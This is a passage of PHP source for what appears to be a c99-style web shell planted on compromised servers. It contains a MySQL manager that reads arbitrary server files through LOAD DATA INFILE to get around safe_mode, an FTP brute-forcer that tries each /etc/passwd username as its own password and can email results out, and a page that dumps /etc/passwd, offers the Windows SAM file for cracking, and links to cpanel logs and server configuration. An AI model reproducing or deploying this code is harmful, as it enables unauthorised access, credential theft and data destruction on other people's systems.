1169 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1170 if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
1171 if ($sql_tbl_act == "insert")
1172 {
1173 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1174 if (!empty($sql_tbl_insert_radio))
1175 {
1176
1177 }
1178 else
1179 {
1180 echo "<br><br><b>Inserting row into table:</b><br>";
1181 if (!empty($sql_tbl_insert_q))
1182 {
1183 $sql_query = "SELECT * FROM `".$sql_tbl."`";
1184 $sql_query .= " WHERE".$sql_tbl_insert_q;
1185 $sql_query .= " LIMIT 1;";
1186 $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1187 $values = mysql_fetch_assoc($result);
1188 mysql_free_result($result);
1189 }
1190 else {$values = array();}
1191 echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
1192 foreach ($tbl_struct_fields as $field)
1193 {
1194 $name = $field["Field"];
1195 if (empty($sql_tbl_insert_q)) {$v = "";}
1196 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1197 $i++;
1198 }
1199 echo "</table><br>";
1200 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1201 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1202 echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
1203 }
1204 }
1205 if ($sql_tbl_act == "browse")
1206 {
1207 $sql_tbl_ls = abs($sql_tbl_ls);
1208 $sql_tbl_le = abs($sql_tbl_le);
1209 echo "<hr size=\"1\" noshade>";
1210 echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
1211 $b = 0;
1212 for($i=0;$i<$numpages;$i++)
1213 {
1214 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1215 echo $i;
1216 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1217 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1218 else {echo "&nbsp;";}
1219 }
1220 if ($i == 0) {echo "empty";}
1221 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
1222 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1>";
1223 echo "<tr>";
1224 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
1225 for ($i=0;$i<mysql_num_fields($result);$i++)
1226 {
1227 $v = mysql_field_name($result,$i);
1228 if ($e[0] == "a") {$s = "d"; $m = "asc";}
1229 else {$s = "a"; $m = "desc";}
1230 echo "<td>";
1231 if (empty($e[0])) {$e[0] = "a";}
1232 if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1233 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
1234 echo "</td>";
1235 }
1236 echo "<td><font color=\"green\"><b>Action</b></font></td>";
1237 echo "</tr>";
1238 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1239 {
1240 echo "<tr>";
1241 $w = "";
1242 $i = 0;
1243 foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
1244 if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
1245 echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1246 $i = 0;
1247 foreach ($row as $k=>$v)
1248 {
1249 $v = htmlspecialchars($v);
1250 if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
1251 echo "<td>".$v."</td>";
1252 $i++;
1253 }
1254 echo "<td>";
1255 echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
1256 echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
1257 echo "</td>";
1258 echo "</tr>";
1259 }
1260 mysql_free_result($result);
1261 echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1262 echo "<option value=\"\">With selected:</option>";
1263 echo "<option value=\"deleterow\">Delete</option>";
1264 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1265 }
1266 }
1267 else
1268 {
1269 $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1270 if (!$result) {echo mysql_smarterror();}
1271 else
1272 {
1273 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
1274 $i = 0;
1275 $tsize = $trows = 0;
1276 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1277 {
1278 $tsize += $row["Data_length"];
1279 $trows += $row["Rows"];
1280 $size = view_size($row["Data_length"]);
1281 echo "<tr>";
1282 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
1283 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
1284 echo "<td>".$row["Rows"]."</td>";
1285 echo "<td>".$row["Type"]."</td>";
1286 echo "<td>".$row["Create_time"]."</td>";
1287 echo "<td>".$row["Update_time"]."</td>";
1288 echo "<td>".$size."</td>";
1289 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
1290 echo "</tr>";
1291 $i++;
1292 }
1293 echo "<tr bgcolor=\"000000\">";
1294 echo "<td><center><b>»</b></center></td>";
1295 echo "<td><center><b>".$i." table(s)</b></center></td>";
1296 echo "<td><b>".$trows."</b></td>";
1297 echo "<td>".$row[1]."</td>";
1298 echo "<td>".$row[10]."</td>";
1299 echo "<td>".$row[11]."</td>";
1300 echo "<td><b>".view_size($tsize)."</b></td>";
1301 echo "<td></td>";
1302 echo "</tr>";
1303 echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1304 echo "<option value=\"\">With selected:</option>";
1305 echo "<option value=\"tbldrop\">Drop</option>";
1306 echo "<option value=\"tblempty\">Empty</option>";
1307 echo "<option value=\"tbldump\">Dump</option>";
1308 echo "<option value=\"tblcheck\">Check table</option>";
1309 echo "<option value=\"tbloptimize\">Optimize table</option>";
1310 echo "<option value=\"tblrepair\">Repair table</option>";
1311 echo "<option value=\"tblanalyze\">Analyze table</option>";
1312 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1313 mysql_free_result($result);
1314 }
1315 }
1316 }
1317 }
1318 }
1319 else
1320 {
1321 $acts = array("","newdb","serverstatus","servervars","processes","getfile");
1322 if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
1323 if (!empty($sql_act))
1324 {
1325 echo "<hr size=\"1\" noshade>";
1326 if ($sql_act == "newdb")
1327 {
1328 echo "<b>";
1329 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1330 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1331 }
1332 if ($sql_act == "serverstatus")
1333 {
1334 $result = mysql_query("SHOW STATUS", $sql_sock);
1335 echo "<center><b>Server-status variables:</b><br><br>";
1336 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1337 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1338 echo "</table></center>";
1339 mysql_free_result($result);
1340 }
1341 if ($sql_act == "servervars")
1342 {
1343 $result = mysql_query("SHOW VARIABLES", $sql_sock);
1344 echo "<center><b>Server variables:</b><br><br>";
1345 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1346 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1347 echo "</table>";
1348 mysql_free_result($result);
1349 }
1350 if ($sql_act == "processes")
1351 {
1352 if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
1353 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1354 echo "<center><b>Processes:</b><br><br>";
1355 echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 borderColorLight=#000000 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1356 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1357 echo "</table>";
1358 mysql_free_result($result);
1359 }
1360 if ($sql_act == "getfile")
1361 {
1362 $tmpdb = $sql_login."_tmpdb";
1363 $select = mysql_select_db($tmpdb);
1364 if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1365 if ($select)
1366 {
1367 $created = FALSE;
1368 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1369 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1370 $result = mysql_query("SELECT * FROM tmp_file;");
1371 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1372 else
1373 {
1374 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
1375 $f = "";
1376 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
1377 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1378 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1379 mysql_free_result($result);
1380 mysql_query("DROP TABLE tmp_file;");
1381 }
1382 }
1383 mysql_drop_db($tmpdb); //comment it if you want to leave database
1384 }
1385 }
1386 }
1387 }
1388 echo "</td></tr></table>";
1389 if ($sql_sock)
1390 {
1391 $affected = @mysql_affected_rows($sql_sock);
1392 if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
1393 echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
1394 }
1395 echo "</table>";
1396}
1397if ($act == "mkdir")
1398{
1399 if ($mkdir != $d)
1400 {
1401 if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
1402 elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
1403 echo "<br><br>";
1404 }
1405 $act = $dspact = "ls";
1406}
1407if ($act == "ftpquickbrute")
1408{
1409 echo "<b>Ftp Quick brute:</b><br>";
1410 if (!win) {echo "This functions not work in Windows!<br><br>";}
1411 else
1412 {
1413 function k1r4ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
1414 {
1415 if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
1416 else {$TRUE = TRUE;}
1417 if ($TRUE)
1418 {
1419 $sock = @ftp_connect($host,$port,$timeout);
1420 if (@ftp_login($sock,$login,$pass))
1421 {
1422 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
1423 ob_flush();
1424 return TRUE;
1425 }
1426 }
1427 }
1428 if (!empty($submit))
1429 {
1430 if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1431 $fp = fopen("/etc/passwd","r");
1432 if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1433 else
1434 {
1435 if ($fqb_logging)
1436 {
1437 if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1438 else {$fqb_logfp = FALSE;}
1439 $fqb_log = "FTP Quick Brute (called MeTaLTeaM . oRg".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1440 if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1441 }
1442 ob_flush();
1443 $i = $success = 0;
1444 $ftpquick_st = getmicrotime();
1445 while(!feof($fp))
1446 {
1447 $str = explode(":",fgets($fp,2048));
1448 if (k1r4ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
1449 {
1450 echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1451 $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1452 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1453 $success++;
1454 ob_flush();
1455 }
1456 if ($i > $fqb_lenght) {break;}
1457 $i++;
1458 }
1459 if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
1460 $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1461 echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1462 $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1463 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1464 if ($fqb_logemail) {@mail($fqb_logemail,"MeTaLTeaM ".$shver." report",$fqb_log);}
1465 fclose($fqb_logfp);
1466 }
1467 }
1468 else
1469 {
1470 $logfile = $tmpdir_logs."k1r4_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1471 $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1472 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
1473 }
1474 }
1475}
1476if ($act == "d")
1477{
1478 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
1479 else
1480 {
1481 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
1482 if (!$win)
1483 {
1484 echo "<tr><td><b>Owner/Group</b></td><td> ";
1485 $ow = posix_getpwuid(fileowner($d));
1486 $gr = posix_getgrgid(filegroup($d));
1487 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
1488 }
1489 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
1490 }
1491}
1492if ($act == "phpinfo") {@ob_clean(); phpinfo(); k1r4exit();}
1493if ($act == "security")
1494{
1495 echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
1496 if (!$win)
1497 {
1498 if ($nixpasswd)
1499 {
1500 if ($nixpasswd == 1) {$nixpasswd = 0;}
1501 echo "<b>*nix /etc/passwd:</b><br>";
1502 if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
1503 if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
1504 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
1505 $i = $nixpwd_s;
1506 while ($i < $nixpwd_e)
1507 {
1508 $uid = posix_getpwuid($i);
1509 if ($uid)
1510 {
1511 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1512 echo join(":",$uid)."<br>";
1513 }
1514 $i++;
1515 }
1516 }
1517 else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
1518 }
1519 else
1520 {
1521 $v = $_SERVER["WINDIR"]."\repair\sam";
1522 if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
1523 else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
1524 }
1525 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
1526 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
1527 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1528 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1529 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
1530 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
1531 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
1532 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
1533 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
1534 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
1535 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
1536 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
1537 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
1538 displaysecinfo("RAM",myshellexec("free -m"));
1539 displaysecinfo("HDD space",myshellexec("df -h"));
1540 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
1541 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
1542 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
1543 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
1544 displaysecinfo("Is links installed?",myshellexec("which links"));
1545 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
1546 displaysecinfo("Is GET installed?",myshellexec("which GET"));
1547 displaysecinfo("Is perl installed?",myshellexec("which perl"));
1548 displaysecinfo("Where is apache",myshellexec("whereis apache"));
1549 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
1550 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
1551 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
1552 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
1553 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
1554}
1555if ($act == "mkfile")
1556{
1557 if ($mkfile != $d)
1558 {
1559 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
1560 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
1561 else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
1562 }
1563 else {$act = $dspact = "ls";}
1564}
1565if ($act == "encoder")
1566{
1567 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
1568 foreach(array("md5","crypt","sha1","crc32") as $v)
1569 {
1570 echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
1571 }
1572 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
1573 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
1574 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
1575 echo "<center>base64_decode - ";
1576 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
1577 else
1578 {
1579 $debase64 = base64_decode($encoder_input);
1580 $debase64 = str_replace("\0","[0]",$debase64);
1581 $a = explode("\r\n",$debase64);
1582 $rows = count($a);
1583 $debase64 = htmlspecialchars($debase64);
